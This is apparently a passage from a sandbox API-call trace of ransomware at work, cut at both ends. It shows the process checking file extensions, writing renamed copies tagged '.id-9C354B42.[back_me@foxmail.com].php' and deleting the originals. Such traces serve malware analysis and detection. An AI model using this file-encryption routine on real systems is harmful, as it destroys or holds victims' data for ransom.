(lpString1=".docx", lpString2="S.GIF") returned -1 [0037.991] lstrlenW (lpString=".pdf") returned 4 [0037.991] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0037.991] lstrlenW (lpString=".xls") returned 4 [0037.991] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0037.991] lstrlenW (lpString=".xlsx") returned 5 [0037.991] lstrcmpiW (lpString1=".xlsx", lpString2="S.GIF") returned -1 [0037.991] lstrlenW (lpString=".ppt") returned 4 [0037.991] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0037.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.991] lstrlenW (lpString=".zip") returned 4 [0037.991] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0037.991] lstrlenW (lpString=".rar") returned 4 [0037.991] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0037.991] lstrlenW (lpString=".bz2") returned 4 [0037.991] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0037.991] lstrlenW (lpString=".7z") returned 3 [0037.991] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0037.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.991] lstrlenW (lpString=".dbf") returned 4 [0037.991] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0037.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.991] lstrlenW (lpString=".1cd") returned 4 [0037.991] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0037.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.991] lstrlenW (lpString=".jpg") returned 4 [0037.991] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0037.992] lstrcmpiW (lpString1=".JPG", lpString2=".php") returned -1 [0037.992] lstrlenW (lpString="MS.JPG") returned 6 [0037.992] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0038.300] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=1061) returned 1 [0038.300] CloseHandle (hObject=0x1bc) returned 1 [0038.300] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 0x20 [0038.300] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0038.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0038.300] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.300] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0038.301] GetLastError () returned 0x0 [0038.301] ReadFile (in: hFile=0x1bc, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x425, lpOverlapped=0x0) returned 1 [0038.522] WriteFile (in: hFile=0x1f0, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x430, lpOverlapped=0x0) returned 1 [0038.523] ReadFile (in: hFile=0x1bc, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.523] WriteFile (in: hFile=0x1f0, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0038.523] SetEndOfFile (hFile=0x1f0) returned 1 [0038.524] CloseHandle (hObject=0x1f0) returned 1 [0038.524] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.524] SetEndOfFile (hFile=0x1bc) returned 1 [0038.525] CloseHandle (hObject=0x1bc) returned 1 [0038.525] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0038.525] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 1 [0038.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0038.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0038.526] lstrlenW (lpString=".doc") returned 4 [0038.526] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0038.526] lstrlenW (lpString=".docx") returned 5 [0038.526] lstrcmpiW (lpString1=".docx", lpString2="S.JPG") returned -1 [0038.526] lstrlenW (lpString=".pdf") returned 4 [0038.526] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0038.526] lstrlenW (lpString=".xls") returned 4 [0038.526] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0038.526] lstrlenW (lpString=".xlsx") returned 5 [0038.526] lstrcmpiW (lpString1=".xlsx", lpString2="S.JPG") returned -1 [0038.526] lstrlenW (lpString=".ppt") returned 4 [0038.526] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0038.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0038.526] lstrlenW (lpString=".zip") returned 4 [0038.526] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0038.526] lstrlenW (lpString=".rar") returned 4 [0038.526] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0038.526] lstrlenW (lpString=".bz2") returned 4 [0038.526] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0038.526] lstrlenW (lpString=".7z") returned 3 [0038.526] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0038.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0038.526] lstrlenW (lpString=".dbf") returned 4 [0038.526] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0038.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0038.527] lstrlenW (lpString=".1cd") returned 4 [0038.527] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0038.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0038.527] lstrlenW (lpString=".jpg") returned 4 [0038.527] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0038.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0038.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0038.527] lstrlenW (lpString=".doc") returned 4 [0038.527] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0038.527] lstrlenW (lpString=".docx") returned 5 [0038.527] lstrcmpiW (lpString1=".docx", lpString2="S.JPG") returned -1 [0038.527] lstrlenW (lpString=".pdf") returned 4 [0038.527] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0038.527] lstrlenW (lpString=".xls") returned 4 [0038.527] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0038.527] lstrlenW (lpString=".xlsx") returned 5 [0038.527] lstrcmpiW (lpString1=".xlsx", lpString2="S.JPG") returned -1 [0038.527] lstrlenW (lpString=".ppt") returned 4 [0038.527] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0038.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0038.527] lstrlenW (lpString=".zip") returned 4 [0038.527] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0038.527] lstrlenW (lpString=".rar") returned 4 [0038.527] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0038.527] lstrlenW (lpString=".bz2") returned 4 [0038.527] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0038.527] lstrlenW (lpString=".7z") returned 3 [0038.527] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0038.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0038.527] lstrlenW (lpString=".dbf") returned 4 [0038.527] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0038.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0038.528] lstrlenW (lpString=".1cd") returned 4 [0038.528] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0038.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0038.528] lstrlenW (lpString=".jpg") returned 4 [0038.528] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0038.528] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0038.528] lstrlenW (lpString="boxed-split.avi") returned 15 [0038.528] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0039.287] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=62976) returned 1 [0039.287] CloseHandle (hObject=0x1e4) returned 1 [0039.287] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0039.287] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.288] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0039.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0039.288] lstrlenW (lpString=".doc") returned 4 [0039.288] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.288] lstrlenW (lpString=".docx") returned 5 [0039.288] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0039.288] lstrlenW (lpString=".pdf") returned 4 [0039.288] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.288] lstrlenW (lpString=".xls") returned 4 [0039.288] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.288] lstrlenW (lpString=".xlsx") returned 5 [0039.288] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0039.288] lstrlenW (lpString=".ppt") returned 4 [0039.288] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0039.288] lstrlenW (lpString=".zip") returned 4 [0039.288] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.288] lstrlenW (lpString=".rar") returned 4 [0039.288] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.288] lstrlenW (lpString=".bz2") returned 4 [0039.288] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.288] lstrlenW (lpString=".7z") returned 3 [0039.288] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0039.288] lstrlenW (lpString=".dbf") returned 4 [0039.288] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0039.288] lstrlenW (lpString=".1cd") returned 4 [0039.288] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0039.289] lstrlenW (lpString=".jpg") returned 4 [0039.289] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0039.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0039.289] lstrlenW (lpString=".doc") returned 4 [0039.289] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.289] lstrlenW (lpString=".docx") returned 5 [0039.289] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0039.289] lstrlenW (lpString=".pdf") returned 4 [0039.289] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.289] lstrlenW (lpString=".xls") returned 4 [0039.289] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.289] lstrlenW (lpString=".xlsx") returned 5 [0039.289] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0039.289] lstrlenW (lpString=".ppt") returned 4 [0039.289] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0039.289] lstrlenW (lpString=".zip") returned 4 [0039.289] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.289] lstrlenW (lpString=".rar") returned 4 [0039.289] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.289] lstrlenW (lpString=".bz2") returned 4 [0039.289] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.289] lstrlenW (lpString=".7z") returned 3 [0039.289] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0039.289] lstrlenW (lpString=".dbf") returned 4 [0039.289] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0039.289] lstrlenW (lpString=".1cd") returned 4 [0039.290] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0039.290] lstrlenW (lpString=".jpg") returned 4 [0039.290] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.290] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.290] lstrlenW (lpString="ipscsy.xml") returned 10 [0039.290] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0039.524] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2556) returned 1 [0039.524] CloseHandle (hObject=0x1ac) returned 1 [0039.524] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml")) returned 0x20 [0039.524] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.524] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 61 [0039.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 61 [0039.525] lstrlenW (lpString=".doc") returned 4 [0039.525] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.525] lstrlenW (lpString=".docx") returned 5 [0039.525] lstrcmpiW (lpString1=".docx", lpString2="y.xml") returned -1 [0039.525] lstrlenW (lpString=".pdf") returned 4 [0039.525] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.525] lstrlenW (lpString=".xls") returned 4 [0039.525] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.525] lstrlenW (lpString=".xlsx") returned 5 [0039.525] lstrcmpiW (lpString1=".xlsx", lpString2="y.xml") returned -1 [0039.525] lstrlenW (lpString=".ppt") returned 4 [0039.525] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 61 [0039.525] lstrlenW (lpString=".zip") returned 4 [0039.525] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.525] lstrlenW (lpString=".rar") returned 4 [0039.525] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.525] lstrlenW (lpString=".bz2") returned 4 [0039.525] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.525] lstrlenW (lpString=".7z") returned 3 [0039.525] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 61 [0039.525] lstrlenW (lpString=".dbf") returned 4 [0039.525] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 61 [0039.525] lstrlenW (lpString=".1cd") returned 4 [0039.525] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 61 [0039.525] lstrlenW (lpString=".jpg") returned 4 [0039.525] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 61 [0039.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 61 [0039.526] lstrlenW (lpString=".doc") returned 4 [0039.526] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.526] lstrlenW (lpString=".docx") returned 5 [0039.526] lstrcmpiW (lpString1=".docx", lpString2="y.xml") returned -1 [0039.526] lstrlenW (lpString=".pdf") returned 4 [0039.526] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.526] lstrlenW (lpString=".xls") returned 4 [0039.526] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.526] lstrlenW (lpString=".xlsx") returned 5 [0039.526] lstrcmpiW (lpString1=".xlsx", lpString2="y.xml") returned -1 [0039.526] lstrlenW (lpString=".ppt") returned 4 [0039.526] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 61 [0039.526] lstrlenW (lpString=".zip") returned 4 [0039.526] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.526] lstrlenW (lpString=".rar") returned 4 [0039.526] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.526] lstrlenW (lpString=".bz2") returned 4 [0039.526] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.526] lstrlenW (lpString=".7z") returned 3 [0039.526] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 61 [0039.526] lstrlenW (lpString=".dbf") returned 4 [0039.526] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 61 [0039.526] lstrlenW (lpString=".1cd") returned 4 [0039.526] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 61 [0039.526] lstrlenW (lpString=".jpg") returned 4 [0039.526] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.527] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.527] lstrlenW (lpString="ipsfra.xml") returned 10 [0039.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0039.768] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2628) returned 1 [0039.768] CloseHandle (hObject=0x1c0) returned 1 [0039.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml")) returned 0x20 [0039.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.768] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61 [0039.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61 [0039.769] lstrlenW (lpString=".doc") returned 4 [0039.769] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.769] lstrlenW (lpString=".docx") returned 5 [0039.769] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0039.769] lstrlenW (lpString=".pdf") returned 4 [0039.769] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.769] lstrlenW (lpString=".xls") returned 4 [0039.769] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.769] lstrlenW (lpString=".xlsx") returned 5 [0039.769] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0039.769] lstrlenW (lpString=".ppt") returned 4 [0039.769] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61 [0039.769] lstrlenW (lpString=".zip") returned 4 [0039.769] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.769] lstrlenW (lpString=".rar") returned 4 [0039.769] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.769] lstrlenW (lpString=".bz2") returned 4 [0039.769] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.769] lstrlenW (lpString=".7z") returned 3 [0039.769] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61 [0039.769] lstrlenW (lpString=".dbf") returned 4 [0039.769] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61 [0039.769] lstrlenW (lpString=".1cd") returned 4 [0039.769] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61 [0039.769] lstrlenW (lpString=".jpg") returned 4 [0039.769] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61 [0039.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61 [0039.770] lstrlenW (lpString=".doc") returned 4 [0039.770] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.770] lstrlenW (lpString=".docx") returned 5 [0039.770] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0039.770] lstrlenW (lpString=".pdf") returned 4 [0039.770] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.770] lstrlenW (lpString=".xls") returned 4 [0039.770] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.770] lstrlenW (lpString=".xlsx") returned 5 [0039.770] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0039.770] lstrlenW (lpString=".ppt") returned 4 [0039.770] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61 [0039.770] lstrlenW (lpString=".zip") returned 